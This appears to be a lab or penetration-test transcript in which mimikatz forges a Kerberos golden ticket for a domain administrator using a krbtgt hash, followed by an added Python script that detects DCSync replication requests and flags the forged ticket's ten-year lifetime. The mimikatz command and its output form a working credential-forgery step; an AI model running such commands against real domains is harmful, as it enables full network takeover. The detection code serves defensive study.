c:\\Users\\Administrator\\Desktop>**mimikatz.exe "kerberos::golden /user:Administrator /domain:final.com /sid:S-1-5-21-1725955968-4040474791-670206374 /krbtgt:405854caaf49b41e0e585369a001f114 /sids:S-1-5-21-1725955968-4040474791-670206374-519 /ptt" "exit"**
mimikatz.exe "kerberos::golden /user:Administrator /domain:final.com /sid:S-1-5-21-1725955968-4040474791-670206374 /krbtgt:405854caaf49b41e0e585369a001f114 /sids:S-1-5-21-1725955968-4040474791-670206374-519 /ptt" "exit"
.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <http://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <http://pingcastle.com> / <http://mysmartlogon.com> ***/
mimikatz(commandline) # kerberos::golden /user:Administrator /domain:final.com /sid:S-1-5-21-1725955968-4040474791-670206374 /krbtgt:405854caaf49b41e0e585369a001f114 /sids:S-1-5-21-1725955968-4040474791-670206374-519 /ptt
User : Administrator
Domain : final.com (FINAL)
SID : S-1-5-21-1725955968-4040474791-670206374
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-1725955968-4040474791-670206374-519 ;
ServiceKey: 405854caaf49b41e0e585369a001f114 - rc4_hmac_nt
Lifetime : 8/4/2022 2:41:33 AM ; 8/1/2032 2:41:33 AM ; 8/1/2032 2:41:33 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ final.com' successfully submitted for current session
mimikatz(commandline) # exit
Bye!
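Two defender-side checks for the steps recorded above, as an added example that is not part of the original notes. The first flags a DCSync-style replication request: Security event 4662 with Control Access (0x100) on the domain object where the Properties field carries one of the three directory-replication control-access-right GUIDs and the subject is not a known domain-controller account. The second parses the `Lifetime` line mimikatz printed for the forged TGT and compares it with the Kerberos policy maximum (the Windows default for a user ticket is 10 hours); no KDC issues a ten-year TGT, so one found via `klist` or in a memory capture was forged. The 4662 records and the non-replication GUID are constructed, `KNOWN_DCS` is an assumption about the lab domain, and the `Lifetime` line is copied from the output above.

```python
"""Defender-side checks for the DCSync request and the forged TGT shown in
the transcript above.  Added example, not code from the original notes.
The 4662 records below are constructed, KNOWN_DCS is an assumption about
the lab domain, and GOLDEN_LIFETIME is copied from the mimikatz output."""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Control-access-right GUIDs that authorise directory replication.  These
# are well-known Active Directory values; they show up in the Properties
# field of Security event 4662 ("An operation was performed on an object").
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


@dataclass(frozen=True)
class Event4662:
    """The subset of 4662 fields the check needs."""
    subject: str      # SubjectUserName, e.g. "DC01$" or "tina"
    object_type: str  # ObjectType; "domainDNS" for a replication request
    properties: str   # Properties text; holds the access-right GUIDs
    access_mask: int  # AccessMask; 0x100 is Control Access


def replication_rights_in(ev: Event4662) -> list[str]:
    """Return the replication rights named in the event's Properties field."""
    return sorted(
        REPLICATION_RIGHTS[g.lower()]
        for g in GUID_RE.findall(ev.properties)
        if g.lower() in REPLICATION_RIGHTS
    )


def find_dcsync(events, dc_accounts: set[str]) -> list[tuple[str, list[str]]]:
    """Flag Control Access operations that exercise replication rights on
    the domain object from any principal that is not a known DC.  Normal
    replication is DC$ -> DC$, so anything else is a DCSync candidate."""
    hits = []
    for ev in events:
        if not (ev.access_mask & 0x100) or ev.object_type.lower() != "domaindns":
            continue
        rights = replication_rights_in(ev)
        if rights and ev.subject.upper() not in dc_accounts:
            hits.append((ev.subject, rights))
    return hits


# mimikatz prints "Lifetime : <start> ; <end> ; <renew until>" for a forged
# ticket, with month/day/year dates and a 12-hour clock.
LIFETIME_RE = re.compile(r"Lifetime\s*:\s*(.+?)\s*;\s*(.+?)\s*;\s*(.+?)\s*$")
TIME_FMT = "%m/%d/%Y %I:%M:%S %p"


def ticket_lifetime(lifetime_line: str) -> timedelta:
    """Parse a mimikatz Lifetime line and return end - start."""
    m = LIFETIME_RE.search(lifetime_line)
    if not m:
        raise ValueError("not a mimikatz Lifetime line")
    start = datetime.strptime(m.group(1), TIME_FMT)
    end = datetime.strptime(m.group(2), TIME_FMT)
    return end - start


def exceeds_policy(lifetime_line: str, max_ticket_age: timedelta = timedelta(hours=10)) -> bool:
    """True when the TGT lives longer than Kerberos policy allows.  The
    Windows default for 'Maximum lifetime for user ticket' is 10 hours; a
    KDC never issues a longer TGT, so one that does was forged."""
    return ticket_lifetime(lifetime_line) > max_ticket_age


# Constructed sample: DC01$ replicating with a peer is normal; the same
# rights exercised by the user "tina" are not.  The third record uses a
# constructed, non-replication GUID and a plain read mask as a control.
SAMPLE_4662 = [
    Event4662("DC01$", "domainDNS",
              "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
              0x100),
    Event4662("tina", "domainDNS",
              "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} "
              "{89e95b76-444d-4c62-991a-0facbeda640c}",
              0x100),
    Event4662("tina", "user", "{deadbeef-0000-4000-8000-000000000001}", 0x10),
]
KNOWN_DCS = {"DC01$"}  # assumption: the lab domain's controller accounts

# Copied from the forged-ticket output above.
GOLDEN_LIFETIME = "Lifetime : 8/4/2022 2:41:33 AM ; 8/1/2032 2:41:33 AM ; 8/1/2032 2:41:33 AM"

if __name__ == "__main__":
    for subject, rights in find_dcsync(SAMPLE_4662, KNOWN_DCS):
        print(f"DCSync candidate: {subject} exercised {', '.join(rights)}")
    print("forged TGT lifetime:", ticket_lifetime(GOLDEN_LIFETIME),
          "exceeds policy:", exceeds_policy(GOLDEN_LIFETIME))
```

One caveat that the transcript itself illustrates: the DCSync above ran as SYSTEM on dc01, so the DRSUAPI call was authenticated as the DC's own machine account and the 4662 subject would be DC01$, which this account-based rule deliberately allows. Covering that case needs a second signal, such as correlating the replication event with the source address or process rather than the account alone.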